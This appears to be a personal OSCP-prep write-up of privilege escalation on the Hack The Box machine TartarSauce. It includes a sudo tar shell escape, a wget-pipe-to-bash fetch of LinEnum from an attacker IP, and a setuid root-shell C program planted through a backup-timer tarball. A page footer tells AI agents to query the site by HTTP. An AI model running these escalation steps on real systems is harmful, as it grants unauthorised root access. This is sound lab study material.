# Post Exploitation

## Elevating Privileges

Running the following command we can see commands that we can execute without a sudo password

```
sudo -l 
```

![Looks like we can run /bin/tar](/files/-MLDDEGyEwHXG4RMD1vU)

{% embed url="<https://gtfobins.github.io/gtfobins/tar/#sudo>" %}

Upon reading on the tar manual, we can actually use tar to spawn a shell!, wtf?!

```
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

![](/files/-MLDEx61wCj59qOj8sL5)

## Post Exploitation Enumeration

```
wget http://10.10.14.34:80/LinEnum.sh | bash
```

![](/files/-MLhL1JZCEhLob0GOvz_)

The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.

```
$ locate backuper
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer

```

{% embed url="<https://ranakhalil101.medium.com/hack-the-box-tartarsauce-writeup-w-o-metasploit-e73393d4a0cd>" %}

The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.

Create a file on our attacker machine&#x20;

```
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}
```

```
gcc -m32 -o setuid setuid.c
```

{% embed url="<https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02>" %}

```
chmod u+s setuid

root@kali:/var/www/html# ls -l
total 776
-rw-r--r-- 1 root root  10701 May  8  2020 index.html
-rw-r--r-- 1 root root    612 May  8  2020 index.nginx-debian.html
-rwxr-xr-x 1 root root  46631 Oct 15 08:39 LinEnum.sh
-rw-r--r-- 1 root root 706130 Aug 24 17:17 Resume.pdf
-rwsr-xr-x 1 root root  15520 Nov  9 09:22 setuid
-rw-r--r-- 1 root root    110 Nov  9 09:18 setuid.c
-rw-r--r-- 1 root root      0 Aug 10 22:02 test.py

```

Compress the var directory and save it to the file called exploit

```
tar -zcvf exploit var
```

copy to our target machine in /var/tmp

```
attack machine: python -m SimpleHTTPServer 80

target machine: wget http://10.10.14.34:80/exploit
```

check time with&#x20;

```
systemctl list-timers
```

![](/files/-MLhbwgIi-Act9kcXAS-)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/tartarsauce/post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.